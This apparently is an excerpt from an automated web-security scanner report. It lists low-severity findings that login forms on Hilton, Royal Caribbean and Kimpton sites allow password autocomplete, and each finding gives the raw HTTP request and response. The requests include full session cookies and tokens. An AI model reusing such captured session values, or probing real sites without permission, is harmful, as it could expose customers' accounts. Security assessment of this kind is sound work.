Response

HTTP/1.1 302 Moved Temporarily
Server: Netscape-Enterprise/6.0
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml", CP="NOI DSP DEVa TAIa OUR BUS UNI"
Location: /en/hi/login/login.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ?_requestid=21190
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 12:58:36 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Content-Length: 49638

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>



...[SNIP]...
</div>
               <form onsubmit="this.prevPageTitle.value=document.title; return validateLogin();" name="loginForm" method="post" action="https://secure.hilton.com/en/hi/mytravelplanner/my_account.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ?_DARGS=/en/crm/login/widget_homepage.jhtml.8">
                   <input type="hidden" value="/en/hi/login/login.jhtml" name="/com/hilton/crm/client/handler/LoginFormHandler.failureURL">
...[SNIP]...
</label>
                               <input id="PasswordPIN" name="password" type="password" tabindex="5" class="frmTextSignin" value=""><input type="hidden" name="_D:password" value=" ">
...[SNIP]...
13.4. https://secure.royalcaribbean.com/mycruises/login.do  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.royalcaribbean.com
Path:   /mycruises/login.do

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /mycruises/login.do?default=false&cS=MHDR HTTP/1.1
Host: secure.royalcaribbean.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://secure.royalcaribbean.com/mycruises/processBookingLookup.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000Hnty0rieXZnxmfuPhXDAbub:12h3g0fq2; wuc=USA; MSIE_ALERT=true; secure_token_id=H884J0C3E4; s_cc=true; s_sq=royalcaribbeanprod%3D%2526pid%253DRCI%25253Abeforeyouboard%25253AgetCountdownToCruise%25253Acountdowntocruiseloggedout%2526pidt%253D1%2526oid%253Dhttps%25253A%25252F%25252Fsecure.royalcaribbean.com%25252Fmycruises%25252Flogin.do%25253Fdefault%25253Dfalse%252526cS%25253DMHDR%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 12:51:50 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Content-Length: 235364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">


                                   <!
...[SNIP]...
<!--BEGIN MY CRUISES MEMBER LOGIN V1.0-->
               <form name="userLogin" method="POST" action="https://secure.royalcaribbean.com/mycruises/processLogin.do" onsubmit="return validateUserLogin(this);">
               
   
                   <input type="hidden" name="targetUrl" value="" />
...[SNIP]...
<td class="Pad21cSm">
                           <input type="password" name="password" maxlength="18" size="15" value="" class="FieldS1Sm"><div id="password_msg" class="SmColor2Text" style="visibility: hidden; display: none;"/>
...[SNIP]...
13.5. https://secure3.hilton.com/en_US/hi/reservation/book.htm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure3.hilton.com
Path:   /en_US/hi/reservation/book.htm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en_US/hi/reservation/book.htm?execution=e11s1 HTTP/1.1
Host: secure3.hilton.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www3.hilton.com/en_US/hi/search/findhotels/results.htm?view=LIST
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; cross-sell=hi; ClrCSTO=T; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; mmcore.tst=0.558; mmid=-1949538702%7CBQAAAAodekFwyAYAAA%3D%3D; mmcore.pd=-1949538702%7CBQAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635676679:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 12:54:20 GMT
Content-Length: 123236
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<?xml version="1.0" encoding="UTF-8"?>
...[SNIP]...
<div class="gridColFour">
                   
                       
                                                                                           <form id="accountBarSignIn" action="/en_US/hi/reservation/book.htm?execution=e11s1&_eventId=submitLoginForm" method="post" onsubmit="return validateLoginForm(this, 'username', 'password');">
   <p class="fields">
...[SNIP]...
</label>
       <input id="password" name="password" class="text password" type="password" value=""/>
       <input id="rememberMe" name="rememberMe" type="hidden" value="false"/>
...[SNIP]...
13.6. https://secure3.hilton.com/en_US/hi/reservation/book.htm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure3.hilton.com
Path:   /en_US/hi/reservation/book.htm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en_US/hi/reservation/book.htm?execution=e18s1 HTTP/1.1
Host: secure3.hilton.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www3.hilton.com/en_US/hi/search/findhotels/results.htm?view=LIST
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; cross-sell=hi; ClrCSTO=T; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; mmcore.tst=0.353; mmid=-972174836%7CBwAAAAodekFwyAYAAA%3D%3D; mmcore.pd=-972174836%7CBwAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635731104:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 12:55:53 GMT
Content-Length: 103802
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<?xml version="1.0" encoding="UTF-8"?>
...[SNIP]...
<div class="gridColFour">
                   
                       
                                                                                           <form id="accountBarSignIn" action="/en_US/hi/reservation/book.htm?execution=e18s1&_eventId=submitLoginForm" method="post" onsubmit="return validateLoginForm(this, 'username', 'password');">
   <p class="fields">
...[SNIP]...
</label>
       <input id="password" name="password" class="text password" type="password" value=""/>
       <input id="rememberMe" name="rememberMe" type="hidden" value="false"/>
...[SNIP]...
13.7. https://secure3.hilton.com/en_US/hi/reservation/book.htm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure3.hilton.com
Path:   /en_US/hi/reservation/book.htm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en_US/hi/reservation/book.htm;jsessionid=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149?execution=e1s1 HTTP/1.1
Host: secure3.hilton.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.hilton.com/en_US/hi/hotel/BOSLHHH/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041789615,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; cross-sell=hi; ClrCSTO=T; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; mmcore.tst=0.825; mmid=347472783%7CAwAAAAodekFwyAYAAA%3D%3D; mmcore.pd=347472783%7CAwAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635647394:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 12:53:59 GMT
Content-Length: 28801
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<?xml version="1.0" encoding="UTF-8"?>
...[SNIP]...
<div class="gridColFour">
                   
                       
                                                                                           <form id="accountBarSignIn" action="/en_US/hi/reservation/book.htm;jsessionid=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149?execution=e1s1&_eventId=submitLoginForm" method="post" onsubmit="return validateLoginForm(this, 'username', 'password');">
   <p class="fields">
...[SNIP]...
</label>
       <input id="password" name="password" class="text password" type="password" value=""/>
       <input id="rememberMe" name="rememberMe" type="hidden" value="false"/>
...[SNIP]...
13.8. https://secure3.hilton.com/en_US/hi/reservation/book.htm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure3.hilton.com
Path:   /en_US/hi/reservation/book.htm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en_US/hi/reservation/book.htm?execution=e11s1 HTTP/1.1
Host: secure3.hilton.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www3.hilton.com/en_US/hi/search/findhotels/results.htm?view=LIST
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; cross-sell=hi; ClrCSTO=T; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; mmcore.tst=0.558; mmid=-1949538702%7CBQAAAAodekFwyAYAAA%3D%3D; mmcore.pd=-1949538702%7CBQAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635676679:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 12:54:20 GMT
Content-Length: 123236
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<?xml version="1.0" encoding="UTF-8"?>
...[SNIP]...
<div id="modal_content" class="id-modal_content">
                   <form id="login_form" class="id-login_form" action="/en_US/hi/reservation/book.htm?execution=e11s1" method="post">
                       <span id="username_box" class="id-username_box">
...[SNIP]...
wordPIN-modal').className='show-input id-PasswordPIN';document.getElementById('PasswordPIN-modal').focus();"
                               class="show-input clear id-PasswordPINT" id="PasswordPINT" tabindex="3" />
                           <input id="PasswordPIN" name="password" class="hide-input clear id-PasswordPIN" tabindex="3" onblur="javascript:if(this.value==''){this.className='hide-input clear';document.getElementById('PasswordPINT-modal').value='Password or HHonors PIN';document.getElementById('PasswordPINT-modal').className='show-input clear id-PasswordPINT';}" type="password" value=""/>

                           <a href="/en_US/hi/reservation/book.htm?execution=e11s1&_eventId=linkToForgotPassword" tabindex="5" title="Forgot Your Sign In or Password?">
...[SNIP]...
13.9. https://secure3.hilton.com/en_US/hi/reservation/book.htm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure3.hilton.com
Path:   /en_US/hi/reservation/book.htm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en_US/hi/reservation/book.htm?execution=e18s1 HTTP/1.1
Host: secure3.hilton.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www3.hilton.com/en_US/hi/search/findhotels/results.htm?view=LIST
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; cross-sell=hi; ClrCSTO=T; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; mmcore.tst=0.353; mmid=-972174836%7CBwAAAAodekFwyAYAAA%3D%3D; mmcore.pd=-972174836%7CBwAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635731104:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 12:55:53 GMT
Content-Length: 103802
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<?xml version="1.0" encoding="UTF-8"?>
...[SNIP]...
<div id="modal_content" class="id-modal_content">
                   <form id="login_form" class="id-login_form" action="/en_US/hi/reservation/book.htm?execution=e18s1" method="post">
                       <span id="username_box" class="id-username_box">
...[SNIP]...
wordPIN-modal').className='show-input id-PasswordPIN';document.getElementById('PasswordPIN-modal').focus();"
                               class="show-input clear id-PasswordPINT" id="PasswordPINT" tabindex="3" />
                           <input id="PasswordPIN" name="password" class="hide-input clear id-PasswordPIN" tabindex="3" onblur="javascript:if(this.value==''){this.className='hide-input clear';document.getElementById('PasswordPINT-modal').value='Password or HHonors PIN';document.getElementById('PasswordPINT-modal').className='show-input clear id-PasswordPINT';}" type="password" value=""/>

                           <a href="/en_US/hi/reservation/book.htm?execution=e18s1&_eventId=linkToForgotPassword" tabindex="5" title="Forgot Your Sign In or Password?">
...[SNIP]...
13.10. http://www.hilton.com/en/hi/brand/about.jhtml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hilton.com
Path:   /en/hi/brand/about.jhtml

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en/hi/brand/about.jhtml HTTP/1.1
Host: www.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.hilton.com/en_US/hi/index.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; JSESSIONID=UM1GHUXVYDE3SCSGBJBOD4Q; cross-sell=hi; mmcore.tst=0.056; mmid=1706281310%7CFAAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; mmcore.pd=1706281310%7CFAAAAAodekFwyAYAAA%3D%3D; ClrCSTO=T; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317640644129:ss=1317640644129

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml", CP="NOI DSP DEVa TAIa OUR BUS UNI"
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Length: 37539
Date: Mon, 03 Oct 2011 14:17:04 GMT
Connection: close
Vary: Accept-Encoding

<!-- <SETVALUE PARAM="content_head" VALUE="`fileURL("home_head.jhtml")`"> -->

<!-- <SETVALUE PARAM="content_footer" VALUE="`fileURL("home_footer.jhtml")`"> -->


<!DOCTYPE HTML PUBLIC "-//W3C//
...[SNIP]...
</div>
               <form onsubmit="this.prevPageTitle.value=document.title; return validateLogin();" name="loginForm" method="post" action="https://secure.hilton.com/en/hi/mytravelplanner/my_account.jhtml;jsessionid=UM1GHUXVYDE3SCSGBJBOD4Q?_DARGS=/en/crm/login/widget_homepage.jhtml.8">
                   <input type="hidden" value="/en/hi/login/login.jhtml" name="/com/hilton/crm/client/handler/LoginFormHandler.failureURL">
...[SNIP]...
</label>
                               <input id="PasswordPIN" name="password" type="password" tabindex="5" class="frmTextSignin" value=""><input type="hidden" name="_D:password" value=" ">
...[SNIP]...
13.11. http://www.hilton.com/en/hi/info/site_usage.jhtml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hilton.com
Path:   /en/hi/info/site_usage.jhtml

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en/hi/info/site_usage.jhtml HTTP/1.1
Host: www.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.hilton.com/en_US/hi/customersupport/site-usage.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; JSESSIONID=S2VXAICTPUQJWCSGBIYMVCQ; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; cross-sell=hi; ClrCSTO=T; mmcore.tst=0.798; mmid=688320496%7CCQAAAAodekFwyAYAAA%3D%3D; mmcore.pd=688320496%7CCQAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635909366:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml", CP="NOI DSP DEVa TAIa OUR BUS UNI"
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Length: 67255
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 12:58:15 GMT
Connection: close

<!-- <SETVALUE PARAM="content_head" VALUE="`fileURL("home_head.jhtml")`"> -->

<!-- <SETVALUE PARAM="content_footer" VALUE="`fileURL("home_footer.jhtml")`"> -->


<!DOCTYPE HTML PUBLIC "-//W3C//D
...[SNIP]...
</div>
               <form onsubmit="this.prevPageTitle.value=document.title; return validateLogin();" name="loginForm" method="post" action="https://secure.hilton.com/en/hi/mytravelplanner/my_account.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ?_DARGS=/en/crm/login/widget_homepage.jhtml.8">
                   <input type="hidden" value="/en/hi/login/login.jhtml" name="/com/hilton/crm/client/handler/LoginFormHandler.failureURL">
...[SNIP]...
</label>
                               <input id="PasswordPIN" name="password" type="password" tabindex="5" class="frmTextSignin" value=""><input type="hidden" name="_D:password" value=" ">
...[SNIP]...
13.12. http://www.kimptonhotels.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.kimptonhotels.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.kimptonhotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:52:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 92975


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<title>Kimpton Ho
...[SNIP]...
<!-- KIT SIGN-IN -->
<form name="inTouchSignInform" method="POST" action="/intouch/InTouchSignInProxy.aspx" id="inTouchSignInform">

   <ul class="links">
...[SNIP]...
</label>
           <input type="password" name="strPass" id="kitPw" size="20" />
       
           <input type="image" class="submit" src="/assets/btn_miniapp_signin.gif" border="0" alt="Kimpton InTouch Sign In" />
...[SNIP]...
13.13. http://www.kimptonhotels.com/intouch/KIT_overview.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.kimptonhotels.com
Path:   /intouch/KIT_overview.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /intouch/KIT_overview.aspx HTTP/1.1
Host: www.kimptonhotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.kimptonhotels.com/search.aspx?q=xss&search.x=0&search.y=0&search=Search&output=xml_no_dtd&oe=UTF-8&ie=UTF-8&client=nonIFrame_frontend&site=default_collection&proxystylesheet=nonIFrame_frontend&filter=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hytzgqaaykmf3c55utfkf3ns; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635605933:ss=1317635583811; __utma=198844469.653864354.1317646382.1317646382.1317646382.1; __utmb=198844469.2.10.1317646382; __utmc=198844469; __utmz=198844469.1317646382.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:53:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 75799


<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Kimpton InTouch Guest Rewards and Loyalty Program</title>
<meta http-equiv="Content-Type" content="text/html;
...[SNIP]...
<!-- KIT SIGN-IN -->
<form name="inTouchSignInform" method="POST" action="/intouch/InTouchSignInProxy.aspx" id="inTouchSignInform">

   <ul class="links">
...[SNIP]...
</label>
           <input type="password" name="strPass" id="kitPw" size="20" />
       
           <input type="image" class="submit" src="/assets/btn_miniapp_signin.gif" border="0" alt="Kimpton InTouch Sign In" />
...[SNIP]...
13.14. http://www.kimptonhotels.com/restaurants/restaurant-reservations.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.kimptonhotels.com
Path:   /restaurants/restaurant-reservations.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /restaurants/restaurant-reservations.aspx HTTP/1.1
Host: www.kimptonhotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.kimptonhotels.com/intouch/KIT_overview.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hytzgqaaykmf3c55utfkf3ns; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635611005:ss=1317635583811; __utma=198844469.653864354.1317646382.1317646382.1317646382.1; __utmb=198844469.3.10.1317646382; __utmc=198844469; __utmz=198844469.1317646382.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:53:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 144327


<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Gourmet Chef-Driven Restaurants in San Francisco and Major US Cities: Kimpton Hotels</title>
<meta http-equiv
...[SNIP]...
<!-- KIT SIGN-IN -->
<form name="inTouchSignInform" method="POST" action="/intouch/InTouchSignInProxy.aspx" id="inTouchSignInform">

   <ul class="links">
...[SNIP]...
</label>
           <input type="password" name="strPass" id="kitPw" size="20" />
       
           <input type="image" class="submit" src="/assets/btn_miniapp_signin.gif" border="0" alt="Kimpton InTouch Sign In" />
...[SNIP]...
13.15. http://www.kimptonhotels.com/restaurants/restaurants.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.kimptonhotels.com
Path:   /restaurants/restaurants.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /restaurants/restaurants.aspx HTTP/1.1
Host: www.kimptonhotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.kimptonhotels.com/intouch/KIT_overview.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hytzgqaaykmf3c55utfkf3ns; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635611005:ss=1317635583811; __utma=198844469.653864354.1317646382.1317646382.1317646382.1; __utmb=198844469.3.10.1317646382; __utmc=198844469; __utmz=198844469.1317646382.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:53:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 171940


